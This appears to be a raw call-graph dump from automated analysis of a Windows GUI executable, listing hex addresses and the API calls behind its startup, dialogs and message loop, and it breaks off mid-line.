121070->121061 121070->121065 121072 4c796d 121071->121072 121073 4c798b 121072->121073 121077 4c79b2 121072->121077 121166 4d43cc RtlLeaveCriticalSection 121073->121166 121074 4c7a2f 121167 4d43cc RtlLeaveCriticalSection 121074->121167 121077->121074 121078 4c7a4d 121077->121078 121088 4c7d10 121077->121088 121168 4d43cc RtlLeaveCriticalSection 121078->121168 121079 4c7a69 GetVersion 121080 4c7a7b 121079->121080 121080->121061 121083 4c7a8c 121080->121083 121084 4c7c09 121080->121084 121085 4c7c42 121080->121085 121086 4c7b9e 121080->121086 121087 4c7c17 121080->121087 121080->121088 121089 4c7beb 121080->121089 121090 4c7c21 121080->121090 121091 4c7aa2 121080->121091 121092 4c7c62 121080->121092 121093 4c7c79 121080->121093 121094 4c7ab9 121080->121094 121095 4c7c35 121080->121095 121096 4c7b75 121080->121096 121097 4c7c70 121080->121097 121099 4c7bdd 121080->121099 121111 4c7c88 121080->121111 121114 4c79ad 121080->121114 121119 4c7ac7 121080->121119 121120 4c7b34 121080->121120 121082 4c7998 121082->121061 121082->121079 121082->121080 121082->121114 121169 4cc6dd 57 API calls ctype 121083->121169 121176 4cc6dd 57 API calls ctype 121084->121176 121116 4c69ad 58 API calls 121085->121116 121175 4cb10f 57 API calls ctype 121086->121175 121177 4cb10f 57 API calls ctype 121087->121177 121179 4d43cc RtlLeaveCriticalSection 121088->121179 121100 4c69ad 58 API calls 121089->121100 121178 4cb10f 57 API calls ctype 121090->121178 121105 4c69ad 58 API calls 121091->121105 121108 4c69ad 58 API calls 121092->121108 121110 4c69ad 58 API calls 121093->121110 121106 4c69ad 58 API calls 121094->121106 121115 4c69ad 58 API calls 121095->121115 121112 4c69ad 58 API calls 121096->121112 121109 4c69ad 58 API calls 121097->121109 121125 4c6914 23 API calls 121099->121125 121113 4c7bf3 121100->121113 121105->121061 121106->121114 121108->121061 121109->121061 121110->121099 121111->121061 121117 4c69ad 58 API calls 121111->121117 121112->121061 121118 4c69ad 58 API calls 121113->121118 121154 4746d8 121114->121154 121115->121061 121116->121099 121117->121099 121118->121099 121170 4c69d4 121119->121170 121174 4cc770 58 API calls 2 library calls 121120->121174 121123 4c7af3 ctype 121173 4c7082 58 API calls 2 library calls 121123->121173 121125->121061 121128 4d0820 121127->121128 121129 4c95b9 IsWindowEnabled 121128->121129 121130 4d0830 121129->121130 121132 4c728c 2 API calls 121130->121132 121131 4d0848 121131->121051 121132->121131 122778 4c8607 121133->122778 121137 4d0729 PostMessageA 121137->121051 121138 4d06f6 121138->121137 121140 4c6914 23 API calls 121139->121140 121141 4d02a6 121140->121141 121142 4d02c1 121141->121142 121143 4d02c6 PostMessageA 121141->121143 121142->121051 121143->121142 121145 4d4878 ctype 21 API calls 121144->121145 121146 4c6926 121145->121146 121148 4c728c 2 API calls 121146->121148 121147 4c6939 121147->121051 121148->121147 121150 4c72bb CallWindowProcA 121149->121150 121152 4c7299 121149->121152 121151 4c72ce 121150->121151 121151->121052 121152->121150 121153 4c72a7 NtdllDefWindowProc_A 121152->121153 121153->121151 121155 4746e2 __EH_prolog 121154->121155 121180 47eaa1 121155->121180 121159 474710 121255 46e6b9 711 API calls 2 library calls 121159->121255 121161 47471b IsWindow 121163 474737 SendMessageA 121161->121163 121164 474746 ctype 121161->121164 121163->121164 121164->121061 121165->121070 121166->121082 121167->121061 121168->121082 121169->121061 121171 4c693b ctype 57 API calls 121170->121171 121172 4c69db ctype 121171->121172 121172->121123 121173->121120 121174->121061 121175->121061 121176->121061 121177->121061 121178->121099 121179->121114 121181 47eaab __EH_prolog 121180->121181 121256 46e8b0 121181->121256 121183 47ead4 __startOneArgErrorHandling 121184 47ee0d 121183->121184 121267 46ddd7 121183->121267 121187 4c2c3a 62 API calls 121184->121187 121189 47ee59 121187->121189 121191 47a66e 145 API calls 121189->121191 121192 47ee74 121191->121192 121194 4c5eaa ctype 32 API calls 121192->121194 121196 4746fe 121194->121196 121254 416a2f 43 API calls 2 library calls 121196->121254 121254->121159 121255->121161 121257 46e8c2 121256->121257 121266 46e980 121256->121266 121540 481830 121257->121540 121259 4815f0 141 API calls 121260 46e93a 121259->121260 121260->121259 121262 46e962 121260->121262 121546 481930 121260->121546 121263 4815f0 141 API calls 121262->121263 121264 46e96d 121263->121264 121265 481930 141 API calls 121264->121265 121265->121266 121266->121183 121268 481830 141 API calls 121267->121268 121269 46ddf0 121268->121269 121270 46de38 121269->121270 121272 4815f0 141 API calls 121269->121272 121275 481930 141 API calls 121269->121275 121271 4815f0 141 API calls 121270->121271 121273 46de45 121271->121273 121272->121269 121274 481930 141 API calls 121273->121274 121276 46de5c 121274->121276 121275->121269 121277 4c5eaa ctype 32 API calls 121276->121277 121278 46de67 121277->121278 121279 47efc7 121278->121279 121280 47efd1 __EH_prolog 121279->121280 121281 4c5c1f ctype 36 API calls 121280->121281 121282 47eff9 121281->121282 121283 4c5f18 ctype 67 API calls 121282->121283 121284 47f00e 121283->121284 121604 478d21 121284->121604 121287 4c5f18 ctype 67 API calls 121288 47f033 121287->121288 121289 478ba6 48 API calls 121288->121289 121290 47f044 121289->121290 121291 4c5f18 ctype 67 API calls 121290->121291 121292 47f058 121291->121292 121657 473b88 121292->121657 121541 481849 121540->121541 121542 481843 121540->121542 121550 48cfc0 121541->121550 121557 489da0 141 API calls ctype 121542->121557 121547 481940 121546->121547 121582 48a9b0 121547->121582 121549 481952 121549->121260 121558 48dd50 121550->121558 121552 48cfd3 ctype 121570 48d020 121552->121570 121557->121541 121559 48dd9c 121558->121559 121560 48dd5f 121558->121560 121561 48dda1 121559->121561 121562 48ddb5 121559->121562 121563 48dd6b GetProcessHeap RtlFreeHeap 121560->121563 121567 48dd7d 121560->121567 121579 482a80 141 API calls ctype 121561->121579 121565 48ddce GetProcessHeap RtlReAllocateHeap 121562->121565 121566 48ddbe GetProcessHeap RtlAllocateHeap 121562->121566 121563->121567 121568 48ddde 121565->121568 121566->121568 121567->121552 121568->121567 121580 488da0 33 API calls ctype 121568->121580 121571 48dd50 ctype 141 API calls 121570->121571 121572 48d003 121571->121572 121573 48d080 121572->121573 121574 48d098 121573->121574 121575 48d0a3 121573->121575 121581 482a80 141 API calls ctype 121574->121581 121577 48dd50 ctype 141 API calls 121575->121577 121578 48185f 121575->121578 121577->121578 121578->121260 121579->121567 121581->121575 121588 48a9c5 ctype 121582->121588 121584 48aa07 121584->121549 121586 48aa70 121601 48aa90 141 API calls ctype 121586->121601 121587 48aa5c 121600 482a80 141 API calls ctype 121587->121600 121588->121584 121588->121586 121588->121587 121593 48d2c0 121588->121593 121599 482870 141 API calls ctype 121588->121599 121591 48aa82 121591->121549 121592 48aa67 121592->121549 121596 48d2d1 ctype 121593->121596 121594 48d318 121594->121588 121595 48d30d 121603 48d320 141 API calls ctype 121595->121603 121596->121594 121596->121595 121602 482a80 141 API calls ctype 121596->121602 121599->121588 121600->121592 121601->121591 121602->121595 121603->121594 121605 478d2b __EH_prolog 121604->121605 121606 4c5c1f ctype 36 API calls 121605->121606 121607 478d4c 121606->121607 121692 478cd2 121607->121692 121610 478d9a 121611 4c5fe3 ctype 35 API calls 121610->121611 121613 478daa 121610->121613 121611->121613 121612 4c512e ctype 29 API calls 121614 478d62 121612->121614 121698 4af56e 121613->121698 121616 478d75 121614->121616 121707 4788b3 35 API calls 2 library calls 121614->121707 121620 4c5fe3 ctype 35 API calls 121616->121620 121617 478db7 121619 478ea8 121617->121619 121621 478de1 121617->121621 121709 4c2dd9 121617->121709 121622 4c5eaa ctype 32 API calls 121619->121622 121623 478d8b 121620->121623 121626 4c5f18 ctype 67 API calls 121621->121626 121625 478eb3 121622->121625 121708 4c4661 29 API calls ctype 121623->121708 121629 4c5eaa ctype 32 API calls 121625->121629 121632 478dee 121626->121632 121628 478dcd 121716 4c2ce2 121628->121716 121631 478ebf 121629->121631 121631->121287 121633 478e3a 121632->121633 121634 478e01 121632->121634 121722 4b05e8 29 API calls 2 library calls 121633->121722 121721 4c637f 29 API calls ctype 121634->121721 121639 478e4a 121641 4c6033 ctype 35 API calls 121639->121641 121640 478e0d 121642 478e38 121640->121642 121645 4c281a ctype 37 API calls 121640->121645 121643 478e5c 121641->121643 121644 478e9c 121642->121644 121647 4c5c1f ctype 36 API calls 121642->121647 121723 4c63cc 121643->121723 121649 4c5eaa ctype 32 API calls 121644->121649 121648 478e1f 121645->121648 121650 478e7d 121647->121650 121651 4c5fe3 ctype 35 API calls 121648->121651 121649->121619 121652 4c5f18 ctype 67 API calls 121650->121652 121653 478e2c 121651->121653 121654 478e91 121652->121654 121655 4c5eaa ctype 32 API calls 121653->121655 121656 478d21 ctype 85 API calls 121654->121656 121655->121642 121656->121644 121658 473b92 __EH_prolog 121657->121658 121693 478ce2 121692->121693 121694 478d0f 121693->121694 121697 4af56e ctype 29 API calls 121693->121697 121695 4c5eaa ctype 32 API calls 121694->121695 121696 478d17 121695->121696 121696->121610 121696->121612 121697->121693 121699 4af58f 121698->121699 121700 4af57d _wctomb_s 121698->121700 121701 4b62f4 ctype 29 API calls 121699->121701 121700->121617 121703 4af596 121701->121703 121702 4af5fa 121728 4b6355 RtlLeaveCriticalSection 121702->121728 121703->121702 121704 4af60e 121703->121704 121729 4b6355 RtlLeaveCriticalSection 121704->121729 121707->121616 121708->121610 121710 4c5e53 ctype 34 API calls 121709->121710 121711 4c2de2 121710->121711 121730 4b54cd 121711->121730 121713 4c2ded ctype 121714 4c2e06 ___free_lc_time 121713->121714 121715 4b54cd ctype 6 API calls 121713->121715 121714->121628 121715->121713 121717 4c5e53 ctype 34 API calls 121716->121717 121718 4c2cec ctype 121717->121718 121719 478dd5 121718->121719 121720 4b54cd ctype 6 API calls 121718->121720 121720->121718 121721->121640 121722->121639 121724 4c5e53 ctype 34 API calls 121723->121724 121725 4c63d4 121724->121725 121740 4b52da 121725->121740 121728->121700 121729->121700 121731 4b553a 121730->121731 121732 4b54dc 121730->121732 121733 4b554f 121731->121733 121739 4b238d 6 API calls _wctomb_s 121731->121739 121737 4b54fe 121732->121737 121738 4b81c6 6 API calls 2 library calls 121732->121738 121733->121713 121736 4b554b 121736->121713 121737->121713 121738->121737 121739->121736 121741 4b62f4 ctype 29 API calls 121740->121741 122779 4c860f 122778->122779 122780 4c8624 122778->122780 122790 4d3504 122779->122790 122785 4caaeb 122780->122785 122783 4c861d 122793 4c72f6 23 API calls ctype 122783->122793 122786 4d3761 ctype 28 API calls 122785->122786 122787 4caaf0 122786->122787 122788 4caafc 122787->122788 122789 4d373b ctype 28 API calls 122787->122789 122788->121138 122789->122788 122791 4d4878 ctype 21 API calls 122790->122791 122792 4c8614 122791->122792 122792->122780 122792->122783 122793->122780 122794 4c9d26 122795 4c9d30 122794->122795 122797 4c9d54 122794->122797 122796 4c69d4 57 API calls 122795->122796 122798 4c9d39 122796->122798 122798->122797 122801 4ca4e5 122798->122801 122819 46cefa 122798->122819 122802 4ca4ef 122801->122802 122803 4ca4f7 122801->122803 122834 4c8c4e 879 API calls 122802->122834 122835 4c8bfe 882 API calls ctype 122803->122835 122806 4ca4f5 122807 4ca512 122806->122807 122830 4c898d 122806->122830 122836 4ca3bf EndDialog 122807->122836 122811 4ca51b 122811->122797 122812 4ca51f 122837 4c932e 122812->122837 122815 4ca545 122815->122797 122817 4ca536 122842 4c9592 122817->122842 122820 4ca4e5 885 API calls 122819->122820 122821 46cf0a GetClientRect GetWindowRect 122820->122821 122845 4ccc43 ScreenToClient ScreenToClient 122821->122845 122824 4c932e 59 API calls 122825 46cf3a GetWindowRect 122824->122825 122826 4ccc43 3 API calls 122825->122826 122827 46cf4e 122826->122827 122828 4d373b ctype 28 API calls 122827->122828 122829 46cf62 LoadIconA SendMessageA 122828->122829 122829->122797 122831 4c8997 __EH_prolog 122830->122831 122832 4d3504 ctype 21 API calls 122831->122832 122833 4c89b3 122832->122833 122833->122807 122833->122812 122834->122806 122835->122806 122836->122811 122838 4c9348 122837->122838 122839 4c9335 GetDlgItem 122837->122839 122838->122815 122841 4ca48f 28 API calls ctype 122838->122841 122840 4c69ad 58 API calls 122839->122840 122840->122838 122841->122817 122843 4c95a8 122842->122843 122844 4c9599 ShowWindow 122842->122844 122843->122815 122844->122843 122848 4c93fa 122845->122848 122847 46cf31 122847->122824 122849 4c940d 122848->122849 122850 4c9401 GetWindowLongA 122848->122850 122850->122847 122851 4b20a6 GetVersion 122883 4b6f3a HeapCreate 122851->122883 122853 4b2104 122854 4b2109 122853->122854 122855 4b2111 122853->122855 122903 4b21d3 8 API calls _rand 122854->122903 122895 4b6bdc 37 API calls _rand 122855->122895 122859 4b2116 122860 4b211a 122859->122860 122861 4b2122 122859->122861 122904 4b21d3 8 API calls _rand 122860->122904 122896 4bb4ea 34 API calls 2 library calls 122861->122896 122865 4b212c GetCommandLineA 122897 4bb3b8 37 API calls 2 library calls 122865->122897 122867 4b213c 122905 4bb16b 49 API calls 2 library calls 122867->122905 122869 4b2146 122898 4bb0b2 48 API calls 3 library calls 122869->122898 122871 4b214b 122872 4b2150 GetStartupInfoA 122871->122872 122899 4bb05a 48 API calls 122872->122899 122874 4b2162 122875 4b216b 122874->122875 122876 4b2174 GetModuleHandleA 122875->122876 122900 4c22fe 122876->122900 122880 4b218f 122907 4baee2 36 API calls _rand 122880->122907 122882 4b21a0 122884 4b6f5a 122883->122884 122885 4b6f90 122883->122885 122908 4b6df2 57 API calls 2 library calls 122884->122908 122885->122853 122887 4b6f5f 122888 4b6f69 122887->122888 122889 4b6f76 122887->122889 122909 4b6f97 RtlAllocateHeap 122888->122909 122891 4b6f93 122889->122891 122910 4b7ade 5 API calls ctype 122889->122910 122891->122853 122892 4b6f73 122892->122891 122894 4b6f84 HeapDestroy 122892->122894 122894->122885 122895->122859 122896->122865 122897->122867 122898->122871 122899->122874 122911 4cbe9f 122900->122911 122905->122869 122906 4b1b84 32 API calls ctype 122906->122880 122907->122882 122908->122887 122909->122892 122910->122892 122912 4caaeb ctype 28 API calls 122911->122912 122913 4cbeaa 122912->122913 122914 4d373b ctype 28 API calls 122913->122914 122915 4cbeb1 122914->122915 122925 4d49cf SetErrorMode SetErrorMode 122915->122925 122919 4b2186 122919->122906 122920 4cbee6 123304 4d6bd3 60 API calls ctype 122920->123304 122924 4c9592 ShowWindow 122924->122920 122926 4d373b ctype 28 API calls 122925->122926 122927 4d49e6 122926->122927 122928 4d373b ctype 28 API calls 122927->122928 122929 4d49f5 122928->122929 122930 4d4a1b 122929->122930 123305 4d4a32 122929->123305 122932 4d373b ctype 28 API calls 122930->122932 122933 4d4a20 122932->122933 122934 4cbec9 122933->122934 123324 4cab00 122933->123324 122934->122920 122934->122924 122936 4c9f50 122934->122936 122942 479232 122934->122942 123296 49a520 122934->123296 122937 4c9f5b 122936->122937 122938 4c9f60 122936->122938 123383 40f916 28 API calls ctype 122937->123383 123344 4c9f7b 122938->123344 122943 47923c __EH_prolog 122942->122943 122944 4c5f18 ctype 67 API calls 122943->122944 122945 479274 122944->122945 123483 4a8605 122945->123483 122952 4792b2 123888 4cdc20 38 API calls ctype 122952->123888 122953 4792ab 122954 49a520 6 API calls 122953->122954 122956 4792b0 122954->122956 122957 4b1fca 58 API calls 122956->122957 122958 4792c4 122957->122958 123506 4b1f9b 122958->123506 122961 4c2c3a 62 API calls 122962 4792f9 122961->122962 122963 4c2892 29 API calls 122962->122963 122964 47930b 122963->122964 122965 479314 122964->122965 122966 479f58 122964->122966 122968 4c281a ctype 37 API calls 122965->122968 123906 4cdc20 38 API calls ctype 122966->123906 122969 479326 122968->122969 122970 4c5fe3 ctype 35 API calls 122969->122970 122972 479338 122970->122972 122971 4c5eaa ctype 32 API calls 122973 479f7c 122971->122973 122974 4c5eaa ctype 32 API calls 122972->122974 122975 4c5eaa ctype 32 API calls 122973->122975 122976 479344 122974->122976 122978 479f88 122975->122978 122977 4c2c4d 34 API calls 122976->122977 122979 479357 122977->122979 122980 4c5eaa ctype 32 API calls 122978->122980 122981 4c5fe3 ctype 35 API calls 122979->122981 122982 479f93 122980->122982 122983 47936b 122981->122983 122984 4c5eaa ctype 32 API calls 122982->122984 122985 4c5f18 ctype 67 API calls 122983->122985 122986 479b7e 122984->122986 122987 47937d 122985->122987 122986->122920 123509 47a22e 122987->123509 123229 479d98 123229->122971 123297 49a52d GlobalAlloc 123296->123297 123298 49a570 123296->123298 123297->123298 123299 49a540 TlsSetValue 123297->123299 123298->122920 123300 49a55a GlobalHandle GlobalUnlock GlobalFree 123299->123300 123301 49a552 123299->123301 123300->123298 126096 49a410 lstrcpy 123301->126096 123303 49a557 123303->122920 123304->122919 123306 4d373b ctype 28 API calls 123305->123306 123307 4d4a45 GetModuleFileNameA 123306->123307 123308 4afcdb 29 API calls 123307->123308 123309 4d4a77 123308->123309 123335 4d4b4f lstrlen lstrcpyn ctype 123309->123335 123311 4d4a93 123312 4d4aa9 123311->123312 123340 4b5ac3 29 API calls 2 library calls 123311->123340 123314 4d4ae3 123312->123314 123336 4c9c87 123312->123336 123315 4d4b16 123314->123315 123316 4d4afb lstrcpy 123314->123316 123319 4d4b43 123315->123319 123320 4d4b25 lstrcat 123315->123320 123342 4b5ac3 29 API calls 2 library calls 123316->123342 123319->122930 123343 4b5ac3 29 API calls 2 library calls 123320->123343 123325 4d373b ctype 28 API calls 123324->123325 123326 4cab05 123325->123326 123327 4cab5d 123326->123327 123328 4d3504 ctype 21 API calls 123326->123328 123327->122934 123329 4cab11 GetCurrentThreadId SetWindowsHookExA 123328->123329 123330 4d490d ctype 7 API calls 123329->123330 123331 4cab3b 123330->123331 123332 4cab48 123331->123332 123333 4d373b ctype 28 API calls 123331->123333 123334 4d4878 ctype 21 API calls 123332->123334 123333->123332 123334->123327 123335->123311 123337 4d373b ctype 28 API calls 123336->123337 123338 4c9c8d LoadStringA 123337->123338 123339 4c9ca8 123338->123339 123341 4b5ac3 29 API calls 2 library calls 123339->123341 123340->123312 123341->123314 123342->123315 123343->123319 123345 4c9f85 __EH_prolog 123344->123345 123346 4c9f9f 123345->123346 123347 4d373b ctype 28 API calls 123345->123347 123348 4d373b ctype 28 API calls 123346->123348 123347->123346 123349 4c9faa 123348->123349 123384 4c8f92 123349->123384 123352 4c8f92 40 API calls 123353 4c9fcd 123352->123353 123354 4c9f77 123353->123354 123439 4cb875 123353->123439 123354->122920 123356 4ca01f 123357 4ca02f GetSystemMetrics 123356->123357 123358 4ca072 123356->123358 123360 4ca03f 123357->123360 123361 4ca0c4 123357->123361 123358->123361 123453 4cb6c4 GlobalAlloc GlobalLock GlobalUnlock 123358->123453 123363 4af56e ctype 29 API calls 123360->123363 123446 4c6e7b 123361->123446 123362 4ca08d 123454 4cb9fe 10 API calls 123362->123454 123366 4ca04c 123363->123366 123366->123358 123370 4af56e ctype 29 API calls 123366->123370 123368 4ca09c 123455 4cb753 GlobalFree 123368->123455 123372 4ca05f 123370->123372 123371 4c5eaa ctype 32 API calls 123378 4ca101 123371->123378 123372->123358 123375 4af56e ctype 29 API calls 123372->123375 123374 4ca0b3 123374->123361 123376 4ca0b8 GlobalLock 123374->123376 123375->123358 123376->123361 123456 4c6ec7 123378->123456 123380 4ca16d 123380->123354 123382 4ca172 GlobalUnlock GlobalFree 123380->123382 123381 4ca161 DestroyWindow 123381->123380 123382->123354 123383->122938 123385 4d373b ctype 28 API calls 123384->123385 123386 4c8f9d ctype 123385->123386 123387 4d373b ctype 28 API calls 123386->123387 123435 4c8faa 123386->123435 123388 4c8fd5 123387->123388 123389 4c9006 123388->123389 123463 4c75aa 32 API calls 2 library calls 123388->123463 123391 4c9027 123389->123391 123464 4c75aa 32 API calls 2 library calls 123389->123464 123392 4c904e 123391->123392 123465 4c75aa 32 API calls 2 library calls 123391->123465 123395 4c9074 123392->123395 123466 4c8eda 34 API calls ctype 123392->123466 123397 4c90a1 123395->123397 123467 4c8eda 34 API calls ctype 123395->123467 123398 4c90ad 123397->123398 123399 4c90ca 123397->123399 123468 4c8f1b 6 API calls 123398->123468 123402 4c90e4 123399->123402 123403 4c90c2 123399->123403 123405 4c90e2 123402->123405 123406 4c9101 123402->123406 123403->123399 123469 4c8f1b 6 API calls 123403->123469 123405->123402 123470 4c8f1b 6 API calls 123405->123470 123408 4c911a 123406->123408 123409 4c90ff 123406->123409 123410 4c9118 123408->123410 123411 4c9137 123408->123411 123409->123406 123471 4c8f1b 6 API calls 123409->123471 123410->123408 123472 4c8f1b 6 API calls 123410->123472 123414 4c9154 123411->123414 123415 4c9135 123411->123415 123417 4c9152 123414->123417 123418 4c9171 123414->123418 123415->123411 123473 4c8f1b 6 API calls 123415->123473 123417->123414 123474 4c8f1b 6 API calls 123417->123474 123420 4c918e 123418->123420 123421 4c916f 123418->123421 123422 4c918c 123420->123422 123423 4c91ab 123420->123423 123421->123418 123475 4c8f1b 6 API calls 123421->123475 123422->123420 123476 4c8f1b 6 API calls 123422->123476 123426 4c91c4 123423->123426 123427 4c91a9 123423->123427 123429 4c91dd 123426->123429 123430 4c91c2 123426->123430 123427->123423 123477 4c8f1b 6 API calls 123427->123477 123432 4c91fa 123429->123432 123433 4c91db 123429->123433 123430->123426 123478 4c8f1b 6 API calls 123430->123478 123434 4c91f8 123432->123434 123432->123435 123433->123429 123479 4c8f1b 6 API calls 123433->123479 123434->123432 123480 4c8f1b 6 API calls 123434->123480 123435->123352 123438 4c9215 123438->123435 123441 4cb882 123439->123441 123440 4cb88d 123440->123356 123441->123440 123481 4c6351 34 API calls ctype 123441->123481 123443 4cb8c6 WideCharToMultiByte 123444 4c6329 ctype 35 API calls 123443->123444 123445 4cb8df 123444->123445 123445->123356 123447 4d4878 ctype 21 API calls 123446->123447 123448 4c6e8c 123447->123448 123449 4c6ebf CreateDialogIndirectParamA 123448->123449 123450 4c6e9d GetCurrentThreadId SetWindowsHookExA 123448->123450 123449->123371 123450->123449 123451 4c6eba 123450->123451 123482 4c23d5 RaiseException ctype 123451->123482 123453->123362 123454->123368 123455->123374 123457 4d4878 ctype 21 API calls 123456->123457 123458 4c6ed7 123457->123458 123459 4d373b ctype 28 API calls 123458->123459 123460 4c6ede 123459->123460 123461 4c6ef6 123460->123461 123462 4c6eeb UnhookWindowsHookEx 123460->123462 123461->123380 123461->123381 123462->123461 123463->123389 123464->123391 123465->123392 123466->123395 123467->123397 123468->123403 123469->123405 123470->123409 123471->123410 123472->123415 123473->123417 123474->123421 123475->123422 123476->123427 123477->123430 123478->123433 123479->123434 123480->123438 123481->123443 123484 4a860e 123483->123484 123487 4a861d 123483->123487 123485 4d490d ctype 7 API calls 123484->123485 123485->123487 123486 4d373b ctype 28 API calls 123488 47928a 123486->123488 123487->123486 123489 4d4165 123488->123489 123490 4d4179 123489->123490 123491 479292 6FAA1CD0 CoInitialize 123489->123491 123492 4d490d ctype 7 API calls 123490->123492 123503 49a3d0 123491->123503 123493 4d4188 123492->123493 123494 4d4260 123493->123494 123495 4d4193 LoadLibraryA 123493->123495 123494->123491 123497 4d373b ctype 28 API calls 123494->123497 123496 4d41a5 9 API calls 123495->123496 123501 4d4205 123495->123501 123496->123501 123497->123491 123498 4d4223 123499 4d424f FreeLibrary 123498->123499 123500 4d4259 123498->123500 123499->123500 123500->123494 123501->123498 123502 4d373b ctype 28 API calls 123501->123502 123502->123498 123504 49a3d9 TlsAlloc 123503->123504 123505 4792a7 123503->123505 123504->123505 123505->122952 123505->122953 123907 4b6c43 GetLastError TlsGetValue 123506->123907 123508 4792ca GetModuleFileNameA 123508->122961 123510 47a238 __EH_prolog 123509->123510 123888->122956 123906->123229 123908 4b6c5f 123907->123908 123909 4b6c9e SetLastError 123907->123909 123918 4b4dee 30 API calls 2 library calls 123908->123918 123909->123508 123911 4b6c68 123912 4b6c70 TlsSetValue 123911->123912 123913 4b6c96 123911->123913 123912->123913 123914 4b6c81 _rand 123912->123914 123919 4b21ae 7 API calls _rand 123913->123919 123917 4b6c87 GetCurrentThreadId 123914->123917 123916 4b6c9d 123916->123909 123917->123909 123918->123911 123919->123916 126096->123303 126097 4cb05d GetMessageA 126098 4cb074 126097->126098 126099 4cb097 126097->126099 126098->126099 126100 4cb089 TranslateMessage DispatchMessageA 126098->126100 126100->126099 126101 46cd53 126106 4cdabf 126101->126106 126103 46cd6a 126116 4cd9ee 126103->126116 126107 4cdacb 126106->126107 126115 4cdaeb 126106->126115 126126 4cd9bf 126107->126126 126111 4cdae2 126112 4cdaed GetParent 126111->126112 126113 4cdae6 126111->126113 126112->126115 126132 4c23ee RaiseException ctype 126113->126132 126115->126103 126137 4cd9a8 126116->126137 126119 4cda2f 126140 4cd838 lstrlen 126119->126140 126120 4cda07 GetWindowTextLengthA 126145 4c6351 34 API calls ctype 126120->126145 126123 4cda1b GetWindowTextA 126125 4c6329 ctype 35 API calls 126123->126125 126124 46cd7b 126125->126124 126133 4c9358 126126->126133 126129 4cd9df 126131 4c926b 59 API calls 126129->126131 126131->126111 126134 4c935f GetDlgItem 126133->126134 126135 4c9374 126133->126135 126134->126135 126135->126129 126136 4c23ee RaiseException ctype 126135->126136 126138 4cd9bf 2 API calls 126137->126138 126139 4cd9b4 126138->126139 126139->126119 126139->126120 126141 4cd87f SetWindowTextA 126140->126141 126142 4cd856 GetWindowTextA 126140->126142 126143 4cd88b 126141->126143 126142->126141 126144 4cd86b lstrcmp 126142->126144 126143->126124 126144->126141 126144->126143 126145->126123 126146 4c6a59 126147 4c6a6b 126146->126147 126153 4c6a66 126146->126153 126148 4c69d4 57 API calls 126147->126148 126150 4c6a74 126148->126150 126149 4c6a8f NtdllDefWindowProc_A 126149->126153 126150->126149 126151 4c6a7d 126150->126151 126152 4c67e2 874 API calls 126151->126152 126152->126153 126154 489090 126155 4890aa 126154->126155 126156 4890b1 126154->126156 126487 4893a0 141 API calls ctype 126155->126487 126158 4890c9 126156->126158 126488 489210 141 API calls ctype 126156->126488 126160 4890da 126158->126160 126162 489188 ctype 126158->126162 126164 4890f4 ctype 126160->126164 126489 489260 141 API calls ctype 126160->126489 126168 41f715 126162->126168 126186 4352fe 126162->126186 126425 4252cc 126162->126425 126163 4891f0 126164->126164 126169 41f71f __EH_prolog 126168->126169 126170 41ef1b 136 API calls 126169->126170 126171 41f72d 126170->126171 126172 41ebe5 136 API calls 126171->126172 126173 41f739 126172->126173 126490 41ee69 126173->126490 126176 41f761 PeekMessageA 126177 41f8a9 timeGetTime 126176->126177 126181 41f777 126176->126181 126177->126181 126178 41f8cb 126493 41eea7 141 API calls 126178->126493 126180 41f8d4 126180->126163 126181->126176 126181->126178 126182 4c5f18 ctype 67 API calls 126181->126182 126183 4c2c3a 62 API calls 126181->126183 126182->126181 126184 41f884 TranslateMessage DispatchMessageA 126183->126184 126185 4c5eaa ctype 32 API calls 126184->126185 126185->126181 126187 435308 __EH_prolog 126186->126187 126188 41ef1b 140 API calls 126187->126188 126189 435319 126188->126189 126190 41ebe5 140 API calls 126189->126190 126191 435327 126190->126191 126192 41ee69 41 API calls 126191->126192 126193 435331 __ftol 126192->126193 126194 4c5f18 ctype 67 API calls 126193->126194 126195 435355 126194->126195 126499 4146d6 126195->126499 126198 4c5fe3 ctype 35 API calls 126199 435380 126198->126199 126200 4c5eaa ctype 32 API calls 126199->126200 126201 43538c 126200->126201 126202 4353a6 126201->126202 126203 435395 126201->126203 126205 403af0 67 API calls 126202->126205 126204 4c5fe3 ctype 35 API calls 126203->126204 126206 4353a1 126204->126206 126207 4353b0 126205->126207 126515 41eea7 141 API calls 126206->126515 126208 435590 126207->126208 126209 4353de 126207->126209 126210 435679 126208->126210 126211 435599 126208->126211 126213 435570 126209->126213 126214 4353e7 126209->126214 126218 4356e9 126210->126218 126219 43567e 126210->126219 126216 435655 126211->126216 126217 43559f 126211->126217 126215 4c6033 ctype 35 API calls 126213->126215 126221 4353f0 126214->126221 126222 4354bc 126214->126222 126223 43557d 126215->126223 126226 4c6033 ctype 35 API calls 126216->126226 126227 435639 126217->126227 126228 4355a8 126217->126228 126232 4c6033 ctype 35 API calls 126218->126232 126229 435683 126219->126229 126230 4356cc 126219->126230 126220 435a64 126231 4815f0 140 API calls 126220->126231 126233 4354a0 126221->126233 126234 4353f6 126221->126234 126224 4354c5 126222->126224 126225 435554 126222->126225 126236 4c6033 ctype 35 API calls 126223->126236 126237 4354ca 126224->126237 126238 435538 126224->126238 126243 4c6033 ctype 35 API calls 126225->126243 126239 435662 126226->126239 126235 4c6033 ctype 35 API calls 126227->126235 126240 43561d 126228->126240 126241 4355ac 126228->126241 126244 435686 126229->126244 126245 4356af 126229->126245 126242 4c6033 ctype 35 API calls 126230->126242 126247 435a6f 126231->126247 126248 4356f6 126232->126248 126246 4c6033 ctype 35 API calls 126233->126246 126249 435484 126234->126249 126250 4353fe 126234->126250 126261 435642 126235->126261 126262 435426 126236->126262 126263 435518 126237->126263 126264 4354ce 126237->126264 126252 4c6033 ctype 35 API calls 126238->126252 126265 4c6033 ctype 35 API calls 126239->126265 126255 4c6033 ctype 35 API calls 126240->126255 126266 4355b1 126241->126266 126267 4355fd 126241->126267 126254 4356d9 126242->126254 126256 43555d 126243->126256 126268 435689 126244->126268 126286 4c6033 ctype 35 API calls 126244->126286 126251 4c6033 ctype 35 API calls 126245->126251 126257 4354a9 126246->126257 126288 4c5eaa ctype 32 API calls 126247->126288 126258 4c6033 ctype 35 API calls 126248->126258 126253 4c6033 ctype 35 API calls 126249->126253 126259 435403 126250->126259 126260 435468 126250->126260 126271 4356bc 126251->126271 126273 435541 126252->126273 126274 43548d 126253->126274 126275 4c6033 ctype 35 API calls 126254->126275 126276 435626 126255->126276 126277 4c6033 ctype 35 API calls 126256->126277 126278 4c6033 ctype 35 API calls 126257->126278 126258->126262 126279 435407 126259->126279 126280 43544c 126259->126280 126270 4c6033 ctype 35 API calls 126260->126270 126281 